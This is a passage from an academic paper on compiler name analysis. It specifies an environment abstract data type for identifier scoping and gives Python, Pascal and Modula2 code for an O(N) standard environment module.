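Axioms A1-A6 can be transcribed directly into executable form. The following Python sketch (ours, not the standard module) represents an Environment value by the term that constructed it and evaluates the access functions by recursion over that term:

```python
# Persistent transcription of axioms A1-A6. Each constructor returns a tuple
# recording how the Environment value was built.
NoKey = None

def new_env():        return ("NewEnv",)
def new_scope(e):     return ("NewScope", e)
def add(e, i, k):     return ("Add", e, i, k)

def key_in_scope(e, i):
    tag = e[0]
    if tag in ("NewEnv", "NewScope"):        # A1, A2: stop at a scope boundary
        return NoKey
    _, parent, i1, k = e                     # A3
    return k if i1 == i else key_in_scope(parent, i)

def key_in_env(e, i):
    tag = e[0]
    if tag == "NewEnv":                      # A4
        return NoKey
    if tag == "NewScope":                    # A5: look through the boundary
        return key_in_env(e[1], i)
    _, parent, i1, k = e                     # A6
    return k if i1 == i else key_in_env(parent, i)

outer = add(new_env(), "A", 1)               # A bound in the outer scope
inner = add(new_scope(outer), "B", 2)        # nested scope with its own B
print(key_in_scope(inner, "A"))              # None: A is not in this scope
print(key_in_env(inner, "A"))                # 1: but it is inherited
```

Note how hiding falls out of A3/A6: the search returns the first binding found on the way out, so an inner Add for the same identifier shadows an outer one.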
to contain more than one binding for an identifier. An identifier is *overloaded* in an environment if that environment contains more than one binding for the identifier. The key denoted by an overloaded identifier is determined by applying *overload resolution* rules to the set of bindings in the environment. We shall return to the question of overloading in Section 5, where we show how to handle overloaded identifiers with a standard environment module.
There are two situations in which a compiler would create a new *Environment* value by adding a binding:
1) An identifier definition has been imported from some other context. In this case, both the identifier and the key to which it is to be bound are known.
2) A new identifier definition has been encountered. In this case, the identifier is known but the compiler must obtain a new key from the *DefTableKey* ADT.
Regardless of which of these two situations arises, the compiler must deal with the possibility that a declaration for the identifier already exists in the current scope. Because these situations arise frequently, and because each is always handled in exactly the same way, it is convenient to augment the environment ADT with explicit operations to handle them (Figure 3).
If there is no binding for \( i \) in the current scope \( e \), then each of the operations described by Figure 3 introduces one. *AddIdn*, which would be used in situation (1), binds \( i \) to the key \( k \). *DefineIdn* binds \( i \) to a new key that it obtains by invoking the NewKey operation of the DefTableKey abstract data type. The new key is returned so that the compiler can set its properties. Since the key supplied to AddIdn has presumably already had properties set, AddIdn simply returns true to indicate that the definition was allowed.
---
**Signatures**
\[
\begin{align*}
\text{AddIdn} &: \quad \text{Environment} \times \text{Identifier} \times \text{DefTableKey} \rightarrow \text{Boolean} \times \text{Environment} \\
\text{DefineIdn} &: \quad \text{Environment} \times \text{Identifier} \rightarrow \text{DefTableKey} \times \text{Environment}
\end{align*}
\]
**Axioms**
\[
\begin{align*}
\text{(A7)} \quad \text{AddIdn} (e, i, k) &= \text{if } \text{KeyInScope} (e, i) = \text{NoKey} \\
&\quad \text{then } (\text{true}, \text{Add} (e, i, k)) \\
&\quad \text{else } (\text{false}, e) \\
\text{(A8)} \quad \text{DefineIdn} (e, i) &= \text{if } \text{KeyInScope} (e, i) = \text{NoKey} \\
&\quad \text{then } (k, \text{Add} (e, i, k)) \text{ where } k = \text{NewKey} \\
&\quad \text{else } (\text{KeyInScope} (e, i), e)
\end{align*}
\]
---
**Figure 3**
Operations to Introduce Bindings
If the current scope e already contains a binding for i, AddIdn reports that fact by returning false. DefineIdn, on the other hand, conceptually maps all definitions of the same identifier in one scope to the same key. Hence the situation in which an identifier is multiply defined has to be indicated by a property associated with that key. In any event, only the first definition of an identifier in a scope is retained; later definitions of that identifier are ignored.
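A minimal executable reading of A7 and A8, with a single scope modelled as a mutable table, is sketched below in Python. The sketch is our own; in particular, new_key stands in for the NewKey operation of the DefTableKey ADT.

```python
# Sketch of axioms A7/A8 over one scope (identifier -> key). Our own names.
NoKey = None
_next_key = 0

def new_key():                      # stand-in for the DefTableKey ADT's NewKey
    global _next_key
    _next_key += 1
    return _next_key

def add_idn(scope, i, k):           # A7: report whether the definition was new
    if scope.get(i, NoKey) is NoKey:
        scope[i] = k
        return True
    return False

def define_idn(scope, i):           # A8: first definition wins; its key is reused
    if scope.get(i, NoKey) is NoKey:
        scope[i] = new_key()
    return scope[i]

s = {}
k1 = define_idn(s, "x")
k2 = define_idn(s, "x")             # duplicate definition: same key comes back
print(k1 == k2)                     # True
print(add_idn(s, "x", new_key()))   # False: x is already defined in this scope
```

This mirrors the behavior described above: AddIdn signals a duplicate with false, while DefineIdn silently maps all definitions of an identifier in one scope to the first key.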
Figure 4 shows how the environment ADT might be used to perform name analysis. Identifier values are denoted by the identifiers themselves in Figure 4, DefTableKey values by \( k_n \) and Environment values by \( e_n \). The invocations of ADT operations are written next to the constructs with which they are associated. Thus the compiler must execute a DefineIdn operation for the construct in the first line of each program.
The operations invoked in Figures 4a and 4b are identical, but their arguments differ because of the differing scope rules of C and Pascal. In C, a definition is valid from the point of definition to the end of the compound statement containing that definition, while in Pascal a definition is valid throughout the block containing that definition. This difference in scope rules is manifested in the Environment argument of the KeyInEnv invocation for i in the definition of m in each figure. In Figure 4a, \( e_5 \) is used and in Figure 4b \( e_6 \) is used. The difference between these two values is that \( e_5 \) contains only the bindings that textually precede the use of i in the declaration of \( m \), whereas \( e_6 \) contains all of the bindings in the entire block.
Note that the order of the invocations of the ADT operations in Figure 4 is determined by the dependences among them, not by the order in which they are written down. All of the DefineIdn invocations in Figure 4b must be executed before any of the KeyInEnv invocations, because the latter require \( e_6 \) as an argument.
Figure 4b contains an error, because the use of i in the declaration of m precedes its declaration in the following line. The Pascal Standard prohibits use of an identifier before its declaration in all cases except the declaration of a pointer type. Many Pascal compilers do not detect this error: The dependences among the operations in Figure 4b imply that the compiler must visit all identifier definitions in a block before visiting any identifier uses. A compiler that is designed to make exactly one pass, in textual order, over the source program will not be able to satisfy the dependences of Figure 4b without retaining a representation of the entire tree in memory. (There is a way to use the name analysis strategy of Figure 4a for Pascal, keeping additional properties to detect the use-before-definition error.)
int i = 10;
P()
{
int m = i;
int i = 20;
printf("%d %d\n", m, i);
}
a) According to the scope rules of C
const i = 10;
procedure P;
const m = i;
i = 20;
begin
writeln(m, i);
end;
b) According to the scope rules of Pascal
Figure 4
Name Analysis Using the ADT of Figure 3
A straightforward implementation of the environment ADT uses a single record for each invocation of NewScope and Add. Each Environment value is a pointer to one of these records. The record corresponding to an operator invocation simply contains all of the arguments of that invocation. Since Environment values are pointers, this means that the records form singly linked lists that can be searched recursively by procedures that exactly implement the axioms A1-A6 of Figure 2.
Each operation except NewScope has a worst-case time complexity of $O(N)$ in this implementation, where $N$ is the number of identifier declarations in the program. Since the total number of identifier occurrences is proportional to the number of identifier declarations, and some operation with time complexity $O(N)$ must be invoked for every identifier occurrence (AddIdn or DefineIdn for definitions, KeyInEnv or KeyInScope for uses), the asymptotic time complexity of name analysis as a whole will be \( O(N^2) \). The asymptotic storage requirement is \( O(N) \) because there is one fixed-length record for each identifier definition (records corresponding to NewScope operations could be eliminated by adding two flags to the records corresponding to Add operations).
Another possible implementation uses an array of records, indexed by Identifier values, for each Environment value. Each record contains a DefTableKey value (possibly NoKey) specifying the binding of its index, and a Boolean value that is true if and only if the binding occurred in the scope represented by the array. KeyInEnv and KeyInScope are constant time operations in this implementation. Unfortunately the asymptotic space complexity is \( O(N^2) \), and the total time complexity for name analysis remains \( O(N^2) \): Both NewScope and Add must create new arrays, copying the contents of their Environment arguments and setting the flags properly. Thus each of these operations has time complexity \( O(N) \), and the number that must be executed is proportional to \( N \).
3. A State Model for the Environment ADT
The algebraic specification of the environment ADT given in the previous section has a strict value semantics. Each application of a constructor function (NewEnv, NewScope, Add) yields a new Environment value that exists from that time forward. Figure 4 shows, however, that each of these values has a specific "useful lifetime": the portion of the execution history of the name analysis between the time the value is created and the time it is last used. This suggests that the definitions of the previous section overspecify the environment ADT, and that by making a specification that is more precise in terms of the lifetimes of Environment values we might be able to reduce the cost of name analysis.
The useful lifetime of an Environment value depends upon the name analysis strategy used by the compiler, which in turn depends on the scope rules of the source language. Figure 4 illustrated the effect of the essential difference in scope rules: For some languages the scope of a definition begins at the defining point and continues to the end of a region (C-like scope rules); for others the scope of a definition is the entire region in which it is declared (Pascal-like scope rules). A compiler for a language with C-like scope rules might carry out its name analysis task during a single text-order traversal of the source program, as illustrated by Figure 4a. Compilers for languages with Pascal-like scope rules, on the other hand, might traverse every region of the program twice. During the first traversal they would invoke AddIdn or DefineIdn at every definition and ignore all nested regions. The second traversal would invoke KeyInEnv or KeyInScope at every use of an identifier, and would perform both traversals of each nested region. (This strategy is compatible with the value dependence of Figure 4b. We have already pointed out the existence of strategies that retain additional information in order to avoid two traversals when compiling Pascal.)
Now consider the effect of these strategies on the useful lifetimes of the Environment values generated by the environment ADT described in the previous section. NewEnv will be invoked at the beginning of the compilation, and NewScope will be invoked at the beginning of the traversal of each nested region. KeyInEnv or KeyInScope will be invoked at each use of an identifier. Clients of the abstract data type never invoke Add directly; they add bindings by invoking either AddIdn or DefineIdn when a definition is encountered. It is easy to show that if an Environment value is used by either AddIdn or DefineIdn, that value will never be used again by either of the strategies discussed in the previous paragraph. We will therefore assume that AddIdn and DefineIdn do not return new Environment values, but instead alter the state of their Environment argument by adding a binding to the set it represents. (Of course these operations will have no effect on the state if a binding for their Identifier argument is already present in their Environment argument.) An Environment value's state is nothing but the set of bindings it represents. Thus the environment of a program point is actually the state of some Environment value.
Figure 5 shows the consequences of this state model for the examples of Figure 4. Notice that it is no longer possible to determine the order of the invocations from dependences among them. The compiler designer must explicitly take the state of the Environment value into account when deciding upon the correct invocation sequence. In Figure 5a the invocation of KeyInEnv for i in the line defining m must precede the invocation of DefineIdn for i in the following line because the latter operation will change the state of e_2. Similarly, the invocation of KeyInEnv for i in the line defining m in Figure 5b must follow the invocation of DefineIdn for i in the following line because only after the latter operation has the proper state of e_2 been established.
Let us now consider an implementation of the state model using an array of fixed-size records to implement each Environment value. The state of the value defines the content of the array. Each NewEnv and NewScope operation has time complexity O(N), because it must create a new array and either initialize the contents (NewEnv) or copy the content of another array (NewScope). All other operations, however, require only constant time. DefineIdn and AddIdn check a single array element and possibly alter its content; KeyInScope and KeyInEnv simply access the element. The overall time and space complexity of name analysis are therefore reduced to O(N \times S), where N is the number of identifier occurrences and S is the number of distinct regions of the program in which identifiers are declared.
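The cost profile of this state model can be illustrated as follows. The Python sketch below is our own simplification (a dictionary stands in for the array, and the key to bind is passed explicitly rather than obtained from NewKey): NewScope pays a one-time copy, after which every per-identifier operation is constant time.

```python
# State-model sketch: an Environment is a mutable table mapping
# identifier -> (key, defined_in_this_scope). Our own simplification.
NoKey = None

def new_env():
    return {}

def new_scope(e):                   # O(N) copy; inherited bindings keep their
    return {i: (k, False) for i, (k, _) in e.items()}   # keys, flag cleared

def define_idn(e, i, k):            # O(1); first definition in this scope wins
    if i not in e or not e[i][1]:
        e[i] = (k, True)
    return e[i][0]

def key_in_scope(e, i):             # O(1); only bindings made in this scope
    k, here = e.get(i, (NoKey, False))
    return k if here else NoKey

def key_in_env(e, i):               # O(1); inherited bindings included
    return e.get(i, (NoKey, False))[0]

outer = new_env()
define_idn(outer, "i", 1)
inner = new_scope(outer)
print(key_in_env(inner, "i"))       # 1: inherited from the enclosing scope
print(key_in_scope(inner, "i"))     # None: not (yet) defined here
define_idn(inner, "i", 2)           # hides the outer binding
print(key_in_env(inner, "i"))       # 2
```

Because only NewEnv and NewScope cost O(N), the overall O(N × S) bound quoted above follows directly: one copy per region S, constant work per identifier occurrence.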
4. A Standard Environment Module
This section presents an implementation of a standard environment module that supports name analysis in a wide range of compilers. It realizes the state model of the environment ADT described in the previous section. The basic approach is to use a single array of lists of fixed-size records to simulate the implementation discussed at the end of the previous section. For practical situations both the time and space complexity of name analysis using this module are O(N). We first give the details of the module and then analyze its performance.
Figure 6a gives a Pascal definition of the data types manipulated by the module, and Figure 6b illustrates the state of the data structure in a Pascal compiler during the processing of line 12 of Figure 1. (Space limitations only permit us to show three of the StkElts; there are actually many more.) The dotted rectangle at the right of Figure 6b is the AccessMechanism record, which contains the array and a pointer to the record representing the Environment value currently encoded in that array. If the Environment
int i = 10;
P()
{
int m = i;
int i = 20;
printf("%d %d\n", m, i);
}
a) According to the scope rules of C
const i = 10;
procedure P;
const m = i;
i = 20;
begin
writeln(m, i);
end;
b) According to the scope rules of Pascal
Figure 5
Name Analysis Using A State Model
type
Environment = \uparrow \text{EnvImpl}; (* Set of Identifier/Definition pairs *)
Scope = \uparrow \text{RelElt}; (* Single region *)
Access = \uparrow \text{AccessMechanism}; (* Current access state *)
EnvImpl = record
nested: Access; (* Constant-time access to identifier definitions *)
parent: Environment; (* Enclosing environment *)
relate: Scope; (* Current region *)
end;
RelElt = record
idn: Identifier; (* Identifier *)
nxt: Scope; (* Next identifier/definition pair for the current region *)
key: DefTableKey; (* Definition *)
end;
StkPtr = \uparrow \text{StkElt}; (* List implementing a definition stack *)
StkElt = record
out: StkPtr; (* Superseded definitions *)
key: DefTableKey; (* Definition *)
e: Environment; (* Environment containing this definition *)
end;
AccessMechanism = record
IdnTbl : array [0..MaxIdn] of StkPtr; (* Stacks of definitions *)
CurrEnv : Environment; (* Current state of the access mechanism *)
end;
(a) Data objects for the constant-time access function

Definitions of pre-defined identifiers
- Definitions
- with statement body
(b) The data structure during the analysis of line 12, Figure 1
Figure 6
The Data Structure of the Standard Environment Module
value passed to one of the module’s operations is equal to the value specified by this pointer, then the operation is carried out immediately. Otherwise, the contents of the array may be adjusted to reflect the Environment value passed.
The nested field of the EnvImpl record reflects the actual scope nesting, relative to the scope represented by the EnvImpl record. If the scope pointed to by the CurrEnv field of the AccessMechanism is either the scope represented by the EnvImpl record or a scope nested within that scope, then the nested field contains a pointer to the AccessMechanism. Otherwise the nested field contains nil. It is easy to see that definitions for an environment are on the “identifier stacks” addressed by IdnTbl elements if and only if the nested field of its EnvImpl record points to the AccessMechanism. In Figure 6b, CurrEnv is pointing to the EnvImpl record for the with statement body, which is the environment appropriate for line 12 of Figure 1. The identifiers defined in the with statement, the identifiers defined in the program block, and the predefined identifiers are on the identifier stacks. Therefore the nested fields of the EnvImpl records corresponding to those three regions point to the access mechanism. The nested field of the EnvImpl record corresponding to the body of the record declared on line 3 of Figure 1 is nil because the field identifiers are not on the identifier stacks.
Figure 7 gives Pascal code that implements the environment access functions DefineIdn and KeyInEnv. Both begin by making certain that the array reflects the situation in the environment specified by the Environment argument. SetEnv, EnterEnv and LeaveEnv are all private procedures of the environment module. They are used to set up the array so that it reflects a given environment, and are only invoked if some sort of change is necessary.
EnterEnv assumes that the array reflects the parent of the environment to be entered. It scans that environment, pushing a new definition onto the stack for each identifier in the environment. LeaveEnv reverses this operation, removing the top definition from the stack for each identifier in the current environment and thus restoring the array to reflect the parent of the current environment. SetEnv decides on a sequence of leave and enter operations that will make the array reflect the desired environment. If definitions for the desired environment are on the identifier stacks, but the desired environment is not the current one, SetEnv simply leaves environments until the desired environment is reached. Otherwise, SetEnv sets the environment to the parent of the desired one and then enters the desired environment.
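A minimal sketch of this enter/leave discipline, using Python lists as the identifier stacks (names are illustrative, not the module's actual interface):

```python
# Sketch of the single-array access mechanism: idn_tbl maps each
# identifier to a stack of (key, env) pairs; the top entry is the
# currently visible binding. enter_env pushes one entry per definition
# in the environment's own region, leave_env pops them, and set_env
# chooses a leave/enter sequence to reach the desired environment.

class Env:
    def __init__(self, parent=None):
        self.parent = parent
        self.relate = []      # (idn, key) pairs defined in this region
        self.nested = False   # True iff this env's bindings are on the stacks

class Access:
    def __init__(self):
        self.idn_tbl = {}     # idn -> stack of (key, env)
        self.curr_env = None

def enter_env(a, e):
    # Precondition: the array reflects e.parent.
    for idn, key in e.relate:
        a.idn_tbl.setdefault(idn, []).append((key, e))
    e.nested = True
    a.curr_env = e

def leave_env(a, e):
    # Precondition: the array reflects e.
    for idn, _ in e.relate:
        a.idn_tbl[idn].pop()
    e.nested = False
    a.curr_env = e.parent

def set_env(a, e):
    # Make the array reflect e by leaving and/or entering environments.
    if not e.nested:
        if e.parent is not None:
            set_env(a, e.parent)
        enter_env(a, e)
    else:
        while a.curr_env is not e:
            leave_env(a, a.curr_env)
```

Note how `set_env` mirrors SetEnv: if the target's bindings are already on the stacks it only pops, otherwise it recursively establishes the parent and then pushes the target's own region.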
What is the time complexity of the implementation shown in Figure 7? Clearly DefineIdn and KeyInEnv are O(1) if the array reflects the Environment argument. In order to account for the time required to maintain the array’s state, we need to examine the global behavior of the name analyzer. The fundamental question that must be answered is “How often is a particular region considered during name analysis?”
Figure 7 will support a name analyzer that shifts its attention arbitrarily among regions. If each node in the tree is visited a fixed number of times, independent of the size of the program, the tree traversal can only enter a particular region a fixed number of times. If the name analyzer only shifts its attention from one region to another when the tree traversal actually moves from one region to another, then EnterEnv and LeaveEnv will only be executed a fixed number of times for each region. Both EnterEnv and
procedure EnterEnv (e : Environment);
(* Make the state of the array reflect e
On entry:
The state of the array reflects the parent of e *)
var r : Scope; s : StkPtr;
begin r := e → relate;
with e → parent → nested → do begin
while r <> nil do begin
new (s); s → e := e; s → key := r → key; s → out := IdnTbl [r → idn]; IdnTbl [r → idn] := s; r := r → nxt; end;
CurrEnv := e;
end;
end;
procedure LeaveEnv (e : Environment);
(* Make the state of the array reflect the parent of e
On entry:
The state of the array reflects e *)
var r : Scope; s : StkPtr;
begin r := e → relate;
with e → nested → do begin
while r <> nil do begin
s := IdnTbl [r → idn]; IdnTbl [r → idn] := s → out; dispose (s); r := r → nxt end;
CurrEnv := e → parent;
end;
end;
procedure SetEnv (e : Environment);
(* Make the state of the array reflect e *)
begin
if e = nil then Report (DEADLY, 1004 (*Invalid environment*), NoPosition, 1);
if e → nested = nil then begin SetEnv (e → parent); EnterEnv (e) end
else with e → nested → do repeat LeaveEnv (CurrEnv) until CurrEnv = e;
end;
function KeyInEnv (e : Environment; idn : Identifier) : DefTableKey;
begin
with e → nested → do begin
if e <> CurrEnv then SetEnv (e);
if IdnTbl [idn] = nil then KeyInEnv := NoKey else KeyInEnv := IdnTbl [idn] → key;
end;
end;
function DefineIdn (e : Environment; idn : Identifier) : DefTableKey;
var found : boolean; p : DefTableKey; r : Scope; s : StkPtr;
begin
with e → nested → do begin
if e <> CurrEnv then SetEnv (e);
if IdnTbl [idn] = nil then found := false else found := IdnTbl [idn] → e = e;
if found then DefineIdn := IdnTbl [idn] → key
else begin
p := NewKey;
new (r); r → idn := idn; r → key := p; r → nxt := e → relate; e → relate := r;
new (s); s → e := e; s → key := p; s → out := IdnTbl [idn]; IdnTbl [idn] := s;
DefineIdn := p;
end;
end;
end;
Figure 7
Environment Access Operations
LeaveEnv execute a constant number of basic operations for each element of the region’s relate list, which has one entry for each defining occurrence in the region.
Consider a particular region, R. Suppose that R is entered and left T times. Each time the region is entered, E basic operations are executed for each element of R.relate (Figure 6a); each time it is left, L operations are executed for each element of R.relate. Therefore the total number of basic operations executed during the entire compilation for each element of R.relate would be T × (E + L). We can therefore “charge” each defining occurrence in R the time required to execute T × (E + L) basic operations. This shows that we can ignore the costs of EnterEnv and LeaveEnv, because their only effect is to increase the cost of DefineIdn by a constant amount.
All of the operations of the environment module except KeyInScope and NewEnv are O(1) in the worst case when implemented as shown in Figure 7. KeyInScope would also be O(1) if the compiler entered the appropriate region before KeyInScope was applied. Then all that would be needed would be to verify that the association at the top of the stack was defined in that region, just as DefineIdn does. Taking this approach, however, would mean that applied occurrences of field identifiers in Pascal constructs like R.B would require the name analyzer to shift its consideration from the current region to the region of a record definition and then immediately shift it back again. Although Figure 7 is quite capable of doing this, it violates our assumption that the number of times the name analyzer shifts its attention to a given region is independent of the program size. Thus it makes the cost of EnterEnv and LeaveEnv impossible to ignore.
In order to salvage our earlier analysis, we must charge the cost of an EnterEnv operation followed by a LeaveEnv operation to the invocation of KeyInScope that processes R.B. But since that cost is proportional to the number of fields in R, and the cost of KeyInScope implemented as a linear search is also proportional to the number of fields in R, nothing has been gained. Since the search operation is simpler than EnterEnv followed by LeaveEnv, KeyInScope should not use the array access mechanism.
For most programs, field references like R.B are a small fraction of the total number of identifier occurrences. Moreover, the number of fields in a record does not usually grow with overall program size. We can conclude that the implementation of Figure 7 gives essentially O(1) complexity for every operation of the environment module except NewEnv. Since NewEnv is O(N) and is executed once, and the other operations are O(1) and executed O(N) times, the actual growth of the name analysis time with program size is O(N). This contrasts with the O(N^2) growth for the implementation of Section 2.
5. Additional Environment Access Operations
The data structure of Figure 6 provides easy access to information beyond that needed to simply map identifiers into keys. For example, to process the with statement that accesses a record, a Pascal compiler needs access to a list of all of the fields defined for records of that type. It must create a “pseudo-variable” corresponding to each field. The address of the pseudo-variable is the sum of the address of the record accessed by
the `with` statement and the relative address of the field within that record, and the type of the pseudo-variable is the type of the field. Since every record type is a region containing definitions of all of the fields, such a list must be a component of the standard environment's data structure.
When resolving overloading in Algol68 or Ada, the compiler needs to consider hidden bindings for the overloaded identifiers. Again, the data structure for the standard environment has these lists. By defining additional operations, we can make these lists available at very little cost. It is important to note, however, that the additional operations do not form a part of the environment abstract data type and may not be easy to provide with other implementations.
In each case, strict value semantics are appropriate for the operations. One operation returns the desired list, given the Environment (or Environment × Identifier) value on which that list is based. Other operations accept a list of the proper type and yield the information contained in its first element. Finally, an operation accepts a list of the proper type and returns that list with the first element deleted. Figure 8 defines the necessary operations with their signatures. (Scope and StkPtr are defined in Figure 6a.)
Implementation of the operations of Figure 8 is trivial, provided that we can guarantee that the lists on which they operate will not be altered during their operation. This is a reasonable restriction to impose upon the user, given the tasks for which the operations are intended. The restriction could be checked by the module, but such checking is probably not worthwhile.
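A hypothetical Python rendering of these accessors makes the intended usage concrete (the names mirror Figure 8, but the linked-list representation is invented for illustration):

```python
# Sketch of the Figure 8 accessors over a relate list represented as a
# linked list of (idn, key, next) tuples, terminated by None.

def definitions_of(env):      # Environment -> Scope (its relate list)
    return env["relate"]

def idn_of(scope):            # Identifier of the first definition
    return scope[0]

def key_of(scope):            # DefTableKey of the first definition
    return scope[1]

def next_definition(scope):   # rest of the list
    return scope[2]

def all_fields(env):
    # Collect every (idn, key) pair of a record type's region, as a
    # Pascal compiler would when processing a with statement.
    out, s = [], definitions_of(env)
    while s is not None:
        out.append((idn_of(s), key_of(s)))
        s = next_definition(s)
    return out
```

The HiddenBy/HiddenKey/NextHidden trio would walk the `out` chain of an identifier stack in exactly the same head/tail style.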
6. A More Complex Example
The name analysis examples of Figure 5 illustrate the basic use of the standard environment module. In this section we show an additional example that illustrates how so-called "explicit scope control" is handled. It turns out that some care must be taken
DefinitionsOf : Environment → Scope
IdnOf : Scope → Identifier
KeyOf : Scope → DefTableKey
NextDefinition : Scope → Scope
HiddenBy : Environment × Identifier → StkPtr
HiddenKey : StkPtr → DefTableKey
NextHidden : StkPtr → StkPtr
Figure 8
Useful Auxiliary Operations
to preserve the $O(N)$ time bound when processing languages with this form of visibility rules.
Figure 9 shows a program fragment written in Modula2. Each of the comments could be replaced by a sequence of statements, and the variables indicated in the comments would be visible in those statements. “Standard identifiers”, like \texttt{CARDINAL}, are visible everywhere.
The construct \texttt{"MODULE X \cdots END X;"} is called a module declaration. A module declaration explicitly controls the visibility of identifiers. Identifiers declared outside a module declaration are not visible inside it unless they are standard identifiers or they have been named in an import list. Identifiers declared inside a module declaration can be made visible outside it if they are included in an export list.
Modula2 also provides procedure declarations, in which the normal Pascal scope rules apply. Thus the name analysis task of a Modula2 compiler builds and uses environments in much the same way as the name analysis task of a Pascal compiler. A module declaration appearing in a region of a program acts like a sequence of identifier declarations and uses. The name of the module and the identifiers in the export list are all declared by the module declaration, and the identifiers in the import list are used. This effect of the module declaration involves no new concepts, and can be handled by the techniques discussed earlier in this paper.
A module declaration also has the effect of creating a new scope that is a child of the root of the environment module’s tree of scopes (see Figure 6b). Identifiers are defined within a scope created by a module declaration in three ways:
```plaintext
VAR a,b: CARDINAL;
MODULE M;
IMPORT a; EXPORT w,x;
VAR u,v,w: CARDINAL;
MODULE N;
IMPORT u; EXPORT x,y;
VAR x,y,z: CARDINAL;
(* u,x,y,z are visible here *)
END N;
(* a,u,v,w,x,y are visible here *)
END M;
(* a,b,w,x are visible here *)
```
Figure 9
A Modula2 Program
1) They appear in an import list of the module declaration. Identifier \( u \) is introduced into module \( N \) in this way (Figure 9).
2) They appear in the export list of a module declared immediately within the module declaration. Identifier \( y \) is introduced into module \( M \) in this way (Figure 9). Note that identifier \( y \) is not introduced into the main program because the module \( N \) is not declared immediately within the main program.
3) They are defined by a declaration immediately within the module declaration. Identifier \( v \) is introduced into module \( M \) in this way (Figure 9).
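As a check on these three rules, the visible sets annotated in Figure 9 can be recomputed from a toy model (illustrative Python; module names such as M and N, which are also declared in the enclosing scope, are omitted here just as in the figure's comments):

```python
# Illustrative model of Modula2 module visibility: a module's scope
# contains its local declarations, its imports, and the exports of
# immediately-nested modules.

def module_scope(local, imports, nested_exports):
    return set(local) | set(imports) | set(nested_exports)

# Figure 9: MODULE N inside MODULE M inside the main program.
n_scope = module_scope(local={'x', 'y', 'z'}, imports={'u'},
                       nested_exports=set())
m_scope = module_scope(local={'u', 'v', 'w'}, imports={'a'},
                       nested_exports={'x', 'y'})        # exported by N
main_scope = module_scope(local={'a', 'b'}, imports=set(),
                          nested_exports={'w', 'x'})     # exported by M
```

The three computed sets match the comments in Figure 9: `{u,x,y,z}` inside N, `{a,u,v,w,x,y}` inside M, and `{a,b,w,x}` in the main program.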
How can we implement these rules using our standard environment module?
For simplicity, we shall assume that the compiler builds a tree that represents the source program. The shape of the tree is determined by the abstract syntax\(^1\) of Modula2. This means, in particular, that each module declaration is represented by a subtree. In the tree representing Figure 9, module \( M \) is represented by a subtree of the program tree and module \( N \) is represented by a subtree of the module \( M \) tree. The compiler traverses the source program tree, visiting nodes and performing computations. Each visit to a specific kind of node is handled by a single visit procedure. This visit procedure may perform computations and visit children of its node by invoking the appropriate visit procedures. Ultimately, the visit terminates when the visit procedure returns.
To implement the Modula2 scope rules, we associate two visit procedures with module declarations and two with procedure declarations. Figure 10 gives the interface specifications for the procedures that carry out the first visit, and sketches their algorithms. The effect of these procedures is to traverse the tree depth-first, processing the identifier declarations that occur at the top level in every module. According to the interface specification, this makes the export list of each module accessible via that module’s node as a list of (identifier, key) pairs.
It is important to note the difference between visiting a construct and entering the environment associated with a construct. The routines of Figure 10 visit every procedure and module in the program. Only ModuleVisit1 executes any operations of the environment abstract data type. AddIdn verifies that the current environment is the one specified by its Environment argument, as shown in Figure 7 for DefineIdn. If the current environment is not the desired one, then AddIdn invokes SetEnv to enter it. Thus the visit procedures of Figure 10 create an environment for every module and enter that environment to define the identifiers declared within it. Note that environment values are not created for procedures during these visits.
The procedures that carry out the second visit of each module and procedure are shown in Figure 11. A module visit begins by defining all of the imported identifiers, which are stored (with the appropriate keys) in a list attached to the module’s node. This action causes the module’s environment to be entered if it is not already current. Then the import lists of all immediately-nested modules are constructed. Since each identifier on an import list of an immediately-nested module is defined in the environment of the current module, no change of environment is required. Next, all of the identifier uses in the module’s environment are processed. No change of environment is implied by this processing either.
procedure ModuleVisit1(node : TreePtr);
(* First visit to a source program tree node representing a local module
On exit-
node ↑.ExportList = A list of (identifier,key) pairs defining the exported bindings *)
begin
for n:=(* each immediately-nested module declaration *) do ModuleVisit1(n);
for n:=(* each immediately-nested module procedure *) do ProcVisit1(n);
node ↑.Env := NewScope (StandardEnvironment);
for n:=(* each immediately-nested module declaration *) do
for (i,k) in n ↑.ExportList do
if not AddIdn (node ↑.Env,i,k) then (* Report an error *);
(* Process all identifier declarations *)
node ↑.ExportList := nil;
for i:=(* each identifier on an export list *) do
node ↑.ExportList := (i, KeyInEnv (node ↑.Env,i)), node ↑.ExportList;
end;
procedure ProcVisit1(node : TreePtr);
(* First visit to a source program tree node representing a procedure
On exit-
ModuleVisit1 has been applied to all local modules *)
begin
for n:=(* each immediately-nested module declaration *) do ModuleVisit1(n);
for n:=(* each immediately-nested module procedure *) do ProcVisit1(n);
end;
Figure 10
Beginning the Name Analysis for Modula2
procedure ModuleVisit2(node : TreePtr);
(* Second visit to a source program tree node representing a local module
On entry-
node ↑.ImportList=A list of (identifier,key) pairs defining the imported bindings *)
begin
for (i,k) in node ↑.ImportList do
if not AddIdn (node ↑.Env,i,k) then (* Report an error *);
for n :=(* each immediately-nested module declaration *) do
begin n ↑.ImportList:=nil;
for i :=(* each identifier on an export list *) do
n ↑.ImportList:=(i , KeyInEnv (node ↑.Env,i)) , n ↑.ImportList;
end;
(* Process all identifier uses *)
for n :=(* each immediately-nested module procedure *) do ProcVisit2(n);
for n :=(* each immediately-nested module declaration *) do ModuleVisit2(n);
end;
procedure ProcVisit2(node : TreePtr);
(* Second visit to a source program tree node representing a procedure
On exit-
ModuleVisit2 has been applied to all local modules *)
begin
node ↑.Env := NewScope ((* enclosing environment *));
for n :=(* each immediately-nested module declaration *) do
for (i,k) in n ↑.ExportList do
if not AddIdn (node ↑.Env,i,k) then (* Report an error *);
(* Process all identifier declarations *)
(* Process all identifier uses *)
for n :=(* each immediately-nested module declaration *) do
begin n ↑.ImportList:=nil;
for i :=(* each identifier on an export list *) do
n ↑.ImportList:=(i , KeyInEnv (node ↑.Env,i)) , n ↑.ImportList;
end;
for n :=(* each immediately-nested module procedure *) do ProcVisit2(n);
for n :=(* each immediately-nested module declaration *) do ModuleVisit2(n);
end;
Figure 11
Continuing the Modula2 Name Analysis
When an immediately-nested procedure is visited, ProcVisit2 uses NewScope to create the environment for that procedure. It then defines the identifiers exported by modules immediately contained within that procedure in the procedure’s environment. This causes the procedure’s environment to be entered. After processing all of the identifier declarations of the procedure, ProcVisit2 processes the identifier uses and constructs import lists for the immediately-nested modules. None of these operations alter the current environment.
